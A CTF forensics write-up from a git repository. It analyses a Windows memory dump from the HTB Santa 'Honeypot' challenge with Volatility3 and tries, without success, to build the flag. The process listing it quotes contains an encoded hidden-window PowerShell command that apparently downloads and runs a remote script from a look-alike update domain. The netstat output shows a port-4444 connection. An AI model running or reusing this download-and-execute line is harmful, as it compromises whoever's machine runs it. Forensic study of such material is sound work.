aaron/htb-santa-ctf
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
Files
3365ce2c4ecc22e5de4af812e39e76a8d6ef7114
htb-santa-ctf/forensics/honeypot
History
aaron c30174fb3e update
2021-12-06 15:06:12 +01:00
..
connected_ips
add forensics
2021-12-02 22:01:31 +01:00
generate_flags.sh
add typing
2021-12-04 04:45:58 +01:00
README.md
update
2021-12-06 15:06:12 +01:00
test
add forensics
2021-12-02 22:01:31 +01:00
win_cmdline
add forensics
2021-12-02 22:01:31 +01:00
win_malware
add malware scan
2021-12-02 23:04:51 +01:00
win_netscan
add forensics
2021-12-02 22:01:31 +01:00
win_processes
add typing
2021-12-04 04:45:58 +01:00

README.md

Honeypot

Santa really encourages people to be at his good list but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?

  1. Find the full URL used to download the malware.
  2. Find the malicious's process ID.
  3. Find the attackers IP

Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum} Download Link: http://46.101.25.140/forensics_honeypot.zip

Flag

Not pwned. :(

Volatility3

Installation

git clone git@github.com:volatilityfoundation/volatility3.git
cd volatility3
pipenv install
pipenv shell

Useful Commands

# get running processes and pid
python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.cmdline.CmdLine
# get all connected ips
python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.netstat.NetStat

Notes

  • The honeypot.zip file contains a windows memory dump
  • By using the volatility3 framework one can extract data from the dump
  • By checking vol -f honeypot.raw windows.cmdline.CMDLine the malicious process is quite obvious
cat win_cmdline

... snip ...

3504  VBoxTray.exe  "C:\Windows\System32\VBoxTray.exe"
3112  WmiPrvSE.exe  C:\Windows\system32\wbem\wmiprvse.exe
3324  iexplore.exe  "C:\Program Files\Internet Explorer\iexplore.exe"
3344  iexplore.exe  "C:\Program Files\Internet Explorer\iexplore.exe"
SCODEF:3324 CREDAT:14337
2700  powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e
aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732  conhost.exe \??\C:\Windows\system32\conhost.exe
"288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
4028  whoami.exe  Required memory at 0x7ffdf010 is not valid (process exited?)
4036  HOSTNAME.EXE  Required memory at 0x7ffd7010 is not valid (process
exited?)
2924  DumpIt.exe  "C:\Users\Santa\Desktop\DumpIt.exe"
2920  conhost.exe \??\C:\Windows\system32\conhost.exe
"280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
168 dllhost.exe C:\Windows\system32\DllHost.exe
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  • The base64 string in the powershell command contains a url which contains a rickroll, this has to be the url
  • The PID of said command is 2700
  • By examining the currently active connections, using windows.netscan.Netscan the following foreign IPs stand out:
Volatility 3 Framework 1.0.1
Offset    Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner
Created

0x2554b460  TCPv4 10.0.2.15 49226   93.184.220.29 80  ESTABLISHED - - -
0x261e9d30  TCPv4 10.0.2.15 49228   172.67.177.22 443 ESTABLISHED - - -
0x3e2e9cc0  TCPv4 10.0.2.15 49221   212.205.126.106 443 ESTABLISHED - - -
0x3ee98d80  TCPv4 10.0.2.15 49229   147.182.172.189 4444  ESTABLISHED - - -
0x3f1b0df8  TCPv4 10.0.2.15 49216   212.205.126.106 443 ESTABLISHED - - -
0x3f225df8  TCPv4 10.0.2.15 49222   212.205.126.106 443 ESTABLISHED - - -
0x3f547008  TCPv4 10.0.2.15 49220   212.205.126.106 443 ESTABLISHED - - -
0x3f561438  TCPv4 10.0.2.15 49215   204.79.197.203  443 ESTABLISHED - - -
0x3f57c438  TCPv4 10.0.2.15 49218   95.100.210.141  443 ESTABLISHED - - -
0x3f58b4c8  TCPv4 10.0.2.15 49217   212.205.126.106 443 ESTABLISHED - - -
0x3f58c748  TCPv4 10.0.2.15 49223   212.205.126.106 443 ESTABLISHED - - -
0x3f58e9d8  TCPv4 10.0.2.15 49225   172.67.177.22 443 ESTABLISHED - - -
0x3f5c6df8  TCPv4 10.0.2.15 49219   95.100.210.141  443 ESTABLISHED - - -
  • By eliminating all the ips which belong to M$ we end up with a small set of 5 ips.
  • To generate the flag the follwing shell script was used, sadly with no success.
  • I'm unsure about the ... | md5sum part as this adds a hyphen...
#!/bin/bash

list=(
  147.182.172.189 # digital ocean
  #172.67.177.22 # cloudflare net
  #212.205.126.106 # greece
  #93.184.220.29 # edgecast
  #95.100.210.141 # akamai
)

pids=(
  1556 # explorer
  2460 # SearchFilterHo
  2856 # explorer
  3324 # iexplorer
  3344 # iexplorer
)

for ip in ${list[@]}; do
  for pid in ${pids[@]}; do
    echo Generating Flag for $ip and $pid:
    echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}"
    echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}"
  done
done
  • I don't know, maybe the challenge is borked somehow?
Reference in New Issue View Git Blame Copy Permalink